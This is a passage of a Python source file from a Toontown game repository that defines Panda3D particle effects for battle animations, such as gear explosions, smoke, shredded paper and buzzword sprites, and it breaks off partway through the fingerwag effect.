NoraTT/Historical-Commits-Project-Altis-Source
|
fe88e6d07edf418f7de6ad5b3d9ecb3d0d285179
|
[
"Apache-2.0"
] | null | null | null |
toontown/battle/ParticleDefs.py
|
NoraTT/Historical-Commits-Project-Altis-Source
|
fe88e6d07edf418f7de6ad5b3d9ecb3d0d285179
|
[
"Apache-2.0"
] | 4
|
2019-06-20T23:45:23.000Z
|
2020-10-14T20:30:15.000Z
|
from direct.particles import Particles, ForceGroup
from pandac.PandaModules import *
# Registry of particle-effect builders, keyed by function name.
ParticleTable = {}

def particle(func):
    """Decorator: register *func* in ParticleTable under its name.

    Uses func.__name__ (valid in both Python 2 and 3) instead of the
    Py2-only func.func_name, and returns *func* so the decorated
    module-level name remains the function rather than becoming None.
    """
    ParticleTable[func.__name__] = func
    return func
@particle
def gearExplosion(self):
    """Gear-sprite burst: 40 "**/gear" sprites born in one litter from a
    sphere volume, radiating outward, then pulled toward a sink point far
    below (z=-79).  *self* is the particle effect being configured.
    """
    self.reset()
    self.setPos(0.000, 0.000, 4.600)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(40)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(40)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(4.2000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.1600)
    p0.renderer.setFinalXScale(0.160)
    p0.renderer.setInitialYScale(0.1600)
    p0.renderer.setFinalYScale(0.160)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(9.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 9.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(3.2282)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def smokeTest4(self):
    """Rising smoke puffs: sprites growing 2x -> 4x with fade-in/out from a
    disc emitter, tinted dark gray via a color-interpolation ramp.

    NOTE(review): the texture is loaded from a source-tree path
    ('../../ttmodels/src/maps/...') rather than a phase file -- this looks
    like a dev-only asset reference; confirm it resolves in production.
    """
    self.reset()
    self.setPos(0.000, 0.000, 0.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(30)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(2.0000)
    p0.factory.setLifespanSpread(0.5000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAINOUT)
    p0.renderer.setUserAlpha(0.57)
    # Sprite parameters
    p0.renderer.addTextureFromFile('../../ttmodels/src/maps/tt_t_efx_ext_smoke.tif')
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(2.0000)
    p0.renderer.setFinalXScale(4.0000)
    p0.renderer.setInitialYScale(2.0000)
    p0.renderer.setFinalYScale(4.0000)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    p0.renderer.getColorInterpolationManager().addLinear(0.0,1.0,Vec4(0.28235295414924622,0.28235295414924622,0.28235295414924622,1.0),Vec4(0.28235295414924622,0.28235295414924622,0.28235295414924622,1.0),1)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(0.4000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 6.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Disc parameters
    p0.emitter.setRadius(1.0000)
    self.addParticles(p0)
@particle
def gearExplosionSmall(self):
    """Small gear burst: like gearExplosion but with a 6-sprite pool,
    shorter lifespan (1.5s) and smaller sprites (0.112 scale).
    """
    self.reset()
    self.setPos(0.000, 0.000, 4.600)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(6)
    p0.setBirthRate(0.4000)
    p0.setLitterSize(2)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.5000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.112)
    p0.renderer.setFinalXScale(0.112)
    p0.renderer.setInitialYScale(0.112)
    p0.renderer.setFinalYScale(0.112)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(9.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 9.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(3.2282)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def gearExplosionBig(self):
    """Large gear burst: like gearExplosion but with higher launch amplitude
    (15), stronger upward offset force (z=18) and a tighter emitter sphere.
    """
    self.reset()
    self.setPos(0.000, 0.000, 4.600)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(40)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(40)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(4.2000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/gear")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.1600)
    p0.renderer.setFinalXScale(0.160)
    p0.renderer.setInitialYScale(0.1600)
    p0.renderer.setFinalYScale(0.160)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(15.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 18.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(1.6282)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -79.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def poundkey(self):
    """Pound-sign sprite spray: "**/poundsign" sprites grow from zero scale
    while fading out, jittered around the emission point.

    Fix: the original called self.addForceGroup(f0) twice on the same
    ForceGroup (once after each force was added), registering the group --
    and thereby its forces -- twice on the effect.  Both forces are now
    added to the group first and the group is attached exactly once.
    """
    self.reset()
    self.setPos(-0.500, 1.000, 3.100)
    self.setHpr(-180.000, -0.000, 180.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(40)
    p0.setBirthRate(0.20)
    p0.setLitterSize(3)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.5000)
    p0.factory.setLifespanSpread(0.2000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(20.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/poundsign")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.0000)
    p0.renderer.setFinalXScale(0.600)
    p0.renderer.setInitialYScale(0.0000)
    p0.renderer.setFinalYScale(0.600)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(10.0000)
    p0.emitter.setAmplitudeSpread(3.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 4.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.200)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 0.0000), 100.0000, 0)
    force0.setActive(1)
    f0.addForce(force0)
    force1 = LinearJitterForce(4.5449, 0)
    force1.setActive(1)
    f0.addForce(force1)
    self.addForceGroup(f0)
@particle
def shred(self):
    """Paper-shred spray: "**/roll-o-dex" sprites stretched tall then
    flattened, pushed upward, pulled toward a sink below, and scattered
    by noise and jitter forces.
    """
    self.reset()
    self.setPos(0.000, 3.000, 2.300)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(60)
    p0.setBirthRate(0.0600)
    p0.setLitterSize(3)
    p0.setLitterSpread(1)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.9000)
    p0.factory.setLifespanSpread(0.4000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.2000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.0160)
    p0.renderer.setFinalXScale(0.0240)
    p0.renderer.setInitialYScale(0.3200)
    p0.renderer.setFinalYScale(0.0800)
    p0.renderer.setNonanimatedTheta(5.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(5.0000)
    p0.emitter.setAmplitudeSpread(1.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 3.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -7.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.6000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearVectorForce(Vec3(0.0000, 0.0000, 5.0000), 1.0000, 0)
    force0.setActive(1)
    f0.addForce(force0)
    force1 = LinearSinkForce(Point3(0.0000, 0.0000, -8.0000), LinearDistanceForce.FTONEOVERRSQUARED, 14.5479, 155.9407, 1)
    force1.setActive(1)
    f0.addForce(force1)
    force2 = LinearNoiseForce(1.7000, 0)
    force2.setActive(1)
    f0.addForce(force2)
    force3 = LinearJitterForce(12.5698, 0)
    force3.setActive(1)
    f0.addForce(force3)
    self.addForceGroup(f0)
@particle
def withdrawal(self):
    """Dense snow-particle stream: 150-sprite pool emitted from a disc with
    negative amplitude (drawn inward toward the radiate origin), fading in
    and drifting forward under a small vector force.
    """
    self.reset()
    self.setPos(0.000, 10.000, 2.500)
    self.setHpr(-180.000, 0.000, 0.000)
    self.setScale(4.000, 4.000, 4.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    #p0.setRenderer("PointParticleRenderer")
    p0.setEmitter("DiscEmitter")
    p0.setPoolSize(150)
    p0.setBirthRate(0.0200)
    p0.setLitterSize(10)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.4000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAIN)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.04)
    p0.renderer.setFinalXScale(0.3125)
    p0.renderer.setInitialYScale(0.03)
    p0.renderer.setFinalYScale(0.25)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Line parameters
    #p0.renderer.setHeadColor(Vec4(1.00, 0.00, 0.00, 1.00))
    #p0.renderer.setTailColor(Vec4(1.00, 0.00, 0.00, 1.00))
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(-0.4000)
    p0.emitter.setAmplitudeSpread(0.1000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 1.5000, 0.0000))
    # Disc parameters
    p0.emitter.setRadius(1.7000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearVectorForce(Vec3(0.0000, 1.0000, 0.0000), 1.0000, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def mumboJumboSmother(self):
    """Mumbo-jumbo text sprites drawn inward (negative amplitude) from a
    sphere surface while shrinking, heavily jittered.
    """
    self.reset()
    self.setPos(0.000, 0.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereSurfaceEmitter")
    p0.setPoolSize(4)
    p0.setBirthRate(0.1100)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.5000)
    p0.factory.setLifespanSpread(0.0300)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/mumbojumbo-iron")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.40)
    p0.renderer.setFinalXScale(0.10)
    p0.renderer.setInitialYScale(0.20)
    p0.renderer.setFinalYScale(0.05)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(-5.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
    # Sphere Surface parameters
    p0.emitter.setRadius(1.5000)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(37.2697, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def buzzWord(self):
    """Buzzword sprites fired forward from a near-point emitter (radius
    0.001), shrinking in flight and strongly jittered.
    """
    self.reset()
    self.setPos(0.000, 2.000, 3.000)
    self.setHpr(0.000, 0.000, 0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(7)
    p0.setBirthRate(0.2000)
    p0.setLitterSize(1)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.0000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/buzzwords-crash")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.300)
    p0.renderer.setFinalXScale(0.070)
    p0.renderer.setInitialYScale(0.200)
    p0.renderer.setFinalYScale(0.050)
    p0.renderer.setNonanimatedTheta(20.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(8.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 7.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.0010)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearJitterForce(64.5449, 0)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def penSpill(self):
    """Ink-drop spray: black-tinted "**/raindrop" sprites shrinking to
    nothing, pulled toward a sink point far below (z=-99).
    """
    self.reset()
    self.setPos(0.000, 0.000, -0.600)
    self.setHpr(0.000, 0.000, -90.000)
    self.setScale(1.100, 1.100, 1.100)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("SphereVolumeEmitter")
    p0.setPoolSize(70)
    p0.setBirthRate(0.1000)
    p0.setLitterSize(2)
    p0.setLitterSpread(0)
    p0.setSystemLifespan(0.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(0.5000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(400.0000)
    p0.factory.setTerminalVelocitySpread(0.0000)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(1.00)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
    p0.renderer.setColor(Vec4(0, 0, 0, 1.00))
    p0.renderer.setXScaleFlag(1)
    p0.renderer.setYScaleFlag(1)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.05)
    p0.renderer.setFinalXScale(0.000)
    p0.renderer.setInitialYScale(0.05)
    p0.renderer.setFinalYScale(0.000)
    p0.renderer.setNonanimatedTheta(90.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
    p0.emitter.setAmplitude(3.0000)
    p0.emitter.setAmplitudeSpread(0.0000)
    p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
    p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
    p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -2.0000))
    # Sphere Volume parameters
    p0.emitter.setRadius(0.2282)
    self.addParticles(p0)
    f0 = ForceGroup.ForceGroup('forces')
    # Force parameters
    force0 = LinearSinkForce(Point3(0.0000, 0.0000, -99.0000), LinearDistanceForce.FTONEOVERRSQUARED, 15.9701, 95.0100, 1)
    force0.setActive(1)
    f0.addForce(force0)
    self.addForceGroup(f0)
@particle
def fingerwag(self):
    """Stream of "**/blah" speech sprites launched along an explicit vector
    and shrinking in flight; shaped by jitter, a source (repelling) force,
    and a sink force in the 'jfo' group.
    """
    self.reset()
    self.setPos(0.167, 0.692, 3.731)
    self.setHpr(90.000, -36.310, -0.000)
    self.setScale(1.000, 1.000, 1.000)
    p0 = Particles.Particles('particles-1')
    # Particles parameters
    p0.setFactory("PointParticleFactory")
    p0.setRenderer("SpriteParticleRenderer")
    p0.setEmitter("PointEmitter")
    p0.setPoolSize(250)
    p0.setBirthRate(0.2000)
    p0.setLitterSize(2)
    p0.setLitterSpread(2)
    p0.setSystemLifespan(2.0000)
    p0.setLocalVelocityFlag(1)
    p0.setSystemGrowsOlderFlag(0)
    # Factory parameters
    p0.factory.setLifespanBase(1.6000)
    p0.factory.setLifespanSpread(0.0000)
    p0.factory.setMassBase(1.0000)
    p0.factory.setMassSpread(0.0000)
    p0.factory.setTerminalVelocityBase(410.7267)
    p0.factory.setTerminalVelocitySpread(2.3816)
    # Point factory parameters
    # Renderer parameters
    p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
    p0.renderer.setUserAlpha(0.86)
    # Sprite parameters
    p0.renderer.setIgnoreScale(1)
    p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/blah")
    p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
    p0.renderer.setXScaleFlag(0)
    p0.renderer.setYScaleFlag(0)
    p0.renderer.setAnimAngleFlag(0)
    p0.renderer.setInitialXScale(0.400)
    p0.renderer.setFinalXScale(0.0200)
    p0.renderer.setInitialYScale(0.200)
    p0.renderer.setFinalYScale(0.0200)
    p0.renderer.setNonanimatedTheta(0.0000)
    p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPNOBLEND)
    p0.renderer.setAlphaDisable(0)
    # Emitter parameters
    p0.emitter.setEmissionType(BaseParticleEmitter.ETEXPLICIT)
    p0.emitter.setAmplitude(3.0000)
